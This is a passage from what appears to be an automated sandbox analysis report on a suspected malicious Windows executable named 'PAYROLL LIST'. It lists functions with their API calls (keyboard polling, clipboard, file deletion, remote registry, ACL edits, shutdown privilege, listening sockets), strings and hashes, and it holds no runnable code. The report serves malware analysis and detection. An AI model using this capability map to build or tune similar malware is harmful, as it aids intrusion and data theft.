SetCurrentDirectoryW.KERNEL32(00AD39FC), ref: 00A71C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A71C5F
FindClose.KERNEL32(00000000), ref: 00A71C6C
FindClose.KERNEL32(00000000), ref: 00A71C7C

Strings

*.*, xrefs: 00A71BE2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 8c42358277f7a05438b45b0c43e4b3a21cfbf35b201c260e537c763ea3ded88c
Instruction ID: 16ed2a1dd6e62de9baf4ced6d9c1ce199c9daeb1bf897be9909538ec2b450906
Opcode Fuzzy Hash: 8c42358277f7a05438b45b0c43e4b3a21cfbf35b201c260e537c763ea3ded88c
Instruction Fuzzy Hash: 8631B63260021A7BDF11DBF4DC59ADE77ECAF46310F10C566E81AE2190EB70DF868A64

Function 00A71C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00A71CAB
_wcscmp.LIBCMT ref: 00A71CC0
_wcscmp.LIBCMT ref: 00A71CD7

Part of subcall function 00A66BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A66BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00A71D06
FindClose.KERNEL32(00000000), ref: 00A71D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00A71D2D
_wcscmp.LIBCMT ref: 00A71D54
_wcscmp.LIBCMT ref: 00A71D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00A71D7D
SetCurrentDirectoryW.KERNEL32(00AD39FC), ref: 00A71D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A71DA5
FindClose.KERNEL32(00000000), ref: 00A71DB2
FindClose.KERNEL32(00000000), ref: 00A71DC2

Strings

*.*, xrefs: 00A71D28

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 3e0d46fefec125163ceecd49e2488862ced4958666a8733bdcfee61ef9c2374e
Instruction ID: 0d19da7acfb9cb08a88e01da4a7a45c5007dee9aaf065422f48a95ccaa75f7e5
Opcode Fuzzy Hash: 3e0d46fefec125163ceecd49e2488862ced4958666a8733bdcfee61ef9c2374e
Instruction Fuzzy Hash: 9D31F63250061A7ADF21EFA8DC49ADE77ECAF45324F10C556E80AA21D1EB70DE46CE60

Function 00A27D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A27DBD

Strings

\, xrefs: 00A9F95B
\, xrefs: 00A27D89
Q\E, xrefs: 00A286D6
[, xrefs: 00A27E14
[:<:]], xrefs: 00A27D1D
[:>:]], xrefs: 00A27D37
], xrefs: 00A27D9F
\b(?=\w), xrefs: 00A9F85E
\b(?<=\w), xrefs: 00A9F877
^, xrefs: 00A27D96
\, xrefs: 00A27E1D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 784fddcbd59205ef2db69bed6adb29e8fed2562beddba89e562cb71d26b2f8ca
Instruction ID: 4985047ee2cfdcae53f91edbf0b38f11d1ad136a28cc0df38d9cb7534676eaf6
Opcode Fuzzy Hash: 784fddcbd59205ef2db69bed6adb29e8fed2562beddba89e562cb71d26b2f8ca
Instruction Fuzzy Hash: F782A071E04229DFCF24CF98D8807ADB7B1BF45310F25817AD859AB291E7749E85CB90

Function 00A7091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A709DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A709EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A709FB
__wsplitpath.LIBCMT ref: 00A70A59
_wcscat.LIBCMT ref: 00A70A71
_wcscat.LIBCMT ref: 00A70A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A70A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00A70AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00A70ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00A70AFF
_wcscpy.LIBCMT ref: 00A70B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A70B4A

Strings

*.*, xrefs: 00A70B05

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 98fe952c3c2a0c58f0b006df45f05b41a69ce49ed0b25bc9a6880d497bd4ad70
Instruction ID: a0f608ec288b76faa2862e7819acbf0616971a73a88218ddee8934b85ed0dfd7
Opcode Fuzzy Hash: 98fe952c3c2a0c58f0b006df45f05b41a69ce49ed0b25bc9a6880d497bd4ad70
Instruction Fuzzy Hash: BE6138B25043059FDB10DF64C945E9EB3E8FF89314F04892AF989D7252DB31EA45CB92

Function 00A5A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00A5ABD7
Part of subcall function 00A5ABBB: GetLastError.KERNEL32(?,00A5A69F,?,?,?), ref: 00A5ABE1
Part of subcall function 00A5ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00A5A69F,?,?,?), ref: 00A5ABF0
Part of subcall function 00A5ABBB: HeapAlloc.KERNEL32(00000000,?,00A5A69F,?,?,?), ref: 00A5ABF7
Part of subcall function 00A5ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00A5AC0E

Part of subcall function 00A5AC56: GetProcessHeap.KERNEL32(00000008,00A5A6B5,00000000,00000000,?,00A5A6B5,?), ref: 00A5AC62
Part of subcall function 00A5AC56: HeapAlloc.KERNEL32(00000000,?,00A5A6B5,?), ref: 00A5AC69
Part of subcall function 00A5AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A5A6B5,?), ref: 00A5AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A5A6D0
_memset.LIBCMT ref: 00A5A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A5A704
GetLengthSid.ADVAPI32(?), ref: 00A5A715
GetAce.ADVAPI32(?,00000000,?), ref: 00A5A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A5A76E
GetLengthSid.ADVAPI32(?), ref: 00A5A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A5A79A
HeapAlloc.KERNEL32(00000000), ref: 00A5A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A5A7C2
CopySid.ADVAPI32(00000000), ref: 00A5A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A5A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A5A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A5A834

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 7672e05fbd4d631018b0ecb83c62f497b8cd31f68cefb94055dc1fbcca4f0253
Instruction ID: e9b7b73a5245336fb7bdd65da31a894b54b1b3a5c7a8160914103c2a2a5d222d
Opcode Fuzzy Hash: 7672e05fbd4d631018b0ecb83c62f497b8cd31f68cefb94055dc1fbcca4f0253
Instruction Fuzzy Hash: 75515F71A0010AAFDF10DFA5DC44EEEBBB9FF15305F048229F912A7290D734990ACB61

Function 00A663F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A66EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A65FA6,?), ref: 00A66ED8

Part of subcall function 00A672CB: GetFileAttributesW.KERNEL32(?,00A66019), ref: 00A672CC

_wcscat.LIBCMT ref: 00A66441
__wsplitpath.LIBCMT ref: 00A6645F
FindFirstFileW.KERNEL32(?,?), ref: 00A66474
_wcscpy.LIBCMT ref: 00A664A3
_wcscat.LIBCMT ref: 00A664B8
_wcscat.LIBCMT ref: 00A664CA
DeleteFileW.KERNEL32(?), ref: 00A664DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A664EB
FindClose.KERNEL32(00000000), ref: 00A66506

Strings

\*.*, xrefs: 00A6643B
p1#v`K$v, xrefs: 00A664DA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*$p1#v`K$v
API String ID: 2643075503-1732502266
Opcode ID: 16436b3d5b1763b41e7302de3e794fa891015634f2d976bb89a4ede0f1445599
Instruction ID: 754b752064ae2d2df8c2f98b3a1b1c522f3f5299dcdcc405648568ffd5a6bee6
Opcode Fuzzy Hash: 16436b3d5b1763b41e7302de3e794fa891015634f2d976bb89a4ede0f1445599
Instruction Fuzzy Hash: FC3184B2408384AAC721DBE48985DDB77ECAF96314F44092EF6D9C3141EB35D50D87A7

Function 00A26F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 00AA2CB0
LIMIT_RECURSION=, xrefs: 00AA2D7E
UCP), xrefs: 00AA2C8F
BSR_ANYCRLF), xrefs: 00AA2EA0
CRLF), xrefs: 00AA2E43
UTF16), xrefs: 00AA2C56
LF), xrefs: 00AA2E26
ANY), xrefs: 00AA2E60
CR), xrefs: 00AA2E09
NO_START_OPT), xrefs: 00AA2CD1
LIMIT_MATCH=, xrefs: 00AA2CF2
ANYCRLF), xrefs: 00AA2E7D
BSR_UNICODE), xrefs: 00AA2EBA
UTF), xrefs: 00AA2C7C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: b391726778de6aebf85189f12677574866f998bbcbb7a4467e833c4f8567a478
Instruction ID: d33cbd8606964fccb2c1292e3341e6ef4f53d3be947fc8869a47028f5c47a0fc
Opcode Fuzzy Hash: b391726778de6aebf85189f12677574866f998bbcbb7a4467e833c4f8567a478
Instruction Fuzzy Hash: 6F727F71E04229DBDF24CF5CD8807AEB7B5BF49310F14816AE815EB281EB749E81DB90

Function 00A831BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A82BB5,?,?), ref: 00A83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A8328E

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A8332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A833C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A83604
RegCloseKey.ADVAPI32(00000000), ref: 00A83611

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: a5a1f67da750709775668698c4f4a5034f555b7c72af9f31496c203b2b764377
Instruction ID: b1133eb844ba8674ae67b25ededb7017031ae476142e461aa89cb64d6d597681
Opcode Fuzzy Hash: a5a1f67da750709775668698c4f4a5034f555b7c72af9f31496c203b2b764377
Instruction Fuzzy Hash: 92E13B71604210AFCB14EF28C995E6ABBF8EF89710F04856DF54ADB2A1DB30EE05CB51

Function 00A62B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A62B5F
GetAsyncKeyState.USER32(000000A0), ref: 00A62BE0
GetKeyState.USER32(000000A0), ref: 00A62BFB
GetAsyncKeyState.USER32(000000A1), ref: 00A62C15
GetKeyState.USER32(000000A1), ref: 00A62C2A
GetAsyncKeyState.USER32(00000011), ref: 00A62C42
GetKeyState.USER32(00000011), ref: 00A62C54
GetAsyncKeyState.USER32(00000012), ref: 00A62C6C
GetKeyState.USER32(00000012), ref: 00A62C7E
GetAsyncKeyState.USER32(0000005B), ref: 00A62C96
GetKeyState.USER32(0000005B), ref: 00A62CA8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 2ee96a0fc2886b89ba78c011eb64486044b4cdfb8dd80d117d8bc79e5b344133
Instruction ID: 3526887faf604def5b66df8579e0a2528ca0617e6374eed39be4586823b9a6a8
Opcode Fuzzy Hash: 2ee96a0fc2886b89ba78c011eb64486044b4cdfb8dd80d117d8bc79e5b344133
Instruction Fuzzy Hash: 4341B874904FCA6DFF359B6489043F9BFB0AF12344F04805AD9C6566C2DBA49DC8C7A2

Function 00A76D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A76D2E
EmptyClipboard.USER32 ref: 00A76D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00A76D49
CloseClipboard.USER32 ref: 00A76DE8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 38bb339ca90ec222c7b7426eef33b8b67940b1f2565243ce28d1abcef67f011c
Instruction ID: bf09525e8ef245aa94ecf0f064b87dd5d7ac72567d2349417c81a9261b0420fe
Opcode Fuzzy Hash: 38bb339ca90ec222c7b7426eef33b8b67940b1f2565243ce28d1abcef67f011c
Instruction Fuzzy Hash: 0121AE31310A11AFDB11EFA4ED49B6D77A8EF45711F04C01AF98ADB2A2DB30EC028B54

Function 00A7C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00A59ABF: CLSIDFromProgID.OLE32 ref: 00A59ADC
Part of subcall function 00A59ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00A59AF7
Part of subcall function 00A59ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00A59B05
Part of subcall function 00A59ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00A59B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A7C235
_memset.LIBCMT ref: 00A7C242
_memset.LIBCMT ref: 00A7C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00A7C38C
CoTaskMemFree.OLE32(?), ref: 00A7C397

Strings

NULL Pointer assignment, xrefs: 00A7C3E5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: c89782cb365da0034ff63780732f2cfd18c605e4ad4d0a970a5ad75b793c0a8a
Instruction ID: 5ed4f2bbe9560a1370cf7b8e838a3263c1af0a3fed633609cd898ef73b546ac5
Opcode Fuzzy Hash: c89782cb365da0034ff63780732f2cfd18c605e4ad4d0a970a5ad75b793c0a8a
Instruction Fuzzy Hash: 55912C71D00228ABDB10DF94DD95EDEBBB9EF08720F10816AF519A7281DB709A45CFA0

Function 00A679D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5B180
Part of subcall function 00A5B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5B1AD
Part of subcall function 00A5B134: GetLastError.KERNEL32 ref: 00A5B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00A67A0F

Strings

SeShutdownPrivilege, xrefs: 00A679DD
@, xrefs: 00A67A02
, xrefs: 00A679FD

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 50e70b85d6fdb64a538ae29022a44c6da901b8ca9f417eff8e89f549d1fa1230
Instruction ID: 7523f8601588b9efe7c3b7e799728d8195251c64269f6dbe9c8f00eae2a5a055
Opcode Fuzzy Hash: 50e70b85d6fdb64a538ae29022a44c6da901b8ca9f417eff8e89f549d1fa1230
Instruction Fuzzy Hash: 0101A7716782226AF72857F4DC5ABBF7278AB217D9F240928BD53E20D2DA615E0181B0

Function 00A78C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00A78CA8
WSAGetLastError.WSOCK32(00000000), ref: 00A78CB7
bind.WSOCK32(00000000,?,00000010), ref: 00A78CD3
listen.WSOCK32(00000000,00000005), ref: 00A78CE2
WSAGetLastError.WSOCK32(00000000), ref: 00A78CFC
closesocket.WSOCK32(00000000), ref: 00A78D10

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 15907b2ecb7aac87d4a70be4cd61d411407756afe5d20cd51042d2699da02620
Instruction ID: ad36a75d7c4f95a40943b012a9b116481e9a121ae5aecc807a5e44808b922027
Opcode Fuzzy Hash: 15907b2ecb7aac87d4a70be4cd61d411407756afe5d20cd51042d2699da02620
Instruction Fuzzy Hash: 6D21D2316002119FCB14EF68DD49B6E77B9EF49724F14C158F95BA72D2CB34AD028B51

Function 00A66532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00A66554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00A66564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00A66583
__wsplitpath.LIBCMT ref: 00A665A7
_wcscat.LIBCMT ref: 00A665BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A665F9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 041995d7c9720ba2f1de665f7ae6ac18ffb8d389b6f014a813292b7c3ee21033
Instruction ID: 8d4dc5e62d8c374831cee5990701f99501bc581a6b610529d6cb29637ced6b1f
Opcode Fuzzy Hash: 041995d7c9720ba2f1de665f7ae6ac18ffb8d389b6f014a813292b7c3ee21033
Instruction Fuzzy Hash: 05218471900219ABDB10EBA4CD89FEEBBBCAB49300F5004A5F546E7141EB719F85CF61

Function 00A7923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7A82C: inet_addr.WSOCK32(00000000), ref: 00A7A84E

socket.WSOCK32(00000002,00000002,00000011), ref: 00A79296
